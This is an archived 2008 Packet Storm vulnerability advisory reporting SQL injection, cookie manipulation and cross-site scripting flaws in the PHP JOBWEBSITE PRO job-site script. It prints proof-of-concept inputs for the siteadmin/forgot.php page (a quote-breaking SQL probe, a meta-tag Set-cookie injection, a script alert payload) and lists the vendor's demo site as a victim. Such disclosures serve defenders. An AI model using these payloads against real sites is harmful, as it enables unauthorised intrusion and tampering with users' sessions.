phpjobwebsite-cmsqlxss.txt

2008-12-01T00:00:00
ID PACKETSTORM:72469
Type packetstorm
Reporter Pouya Server
Modified 2008-12-01T00:00:00

Description

                                        
                                            `#########################################################  
---------------------------------------------------------  
Portal Name: PHP JOBWEBSITE PRO  
Vendor : http://preproject.com  
Author : Pouya_Server , Pouya.s3rver@Gmail.com  
Vulnerability : (CM,XSS,SQL)  
---------------------------------------------------------  
#########################################################  
[SQL]:  
http://site.com/[Path]/siteadmin/forgot.php?adname=SQL'"&fu=Submit  
  
[Cookie Manipulation]:  
http://site.com/[Path]/siteadmin/forgot.php?adname=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&fu=Submit  
  
[XSS]:  
http:///site/[Path]/siteadmin/forgot.php  
UserName:<script>alert(1369)</script>  
---------------------------------  
  
Victem :  
http://preproject.com/jobpro/  
`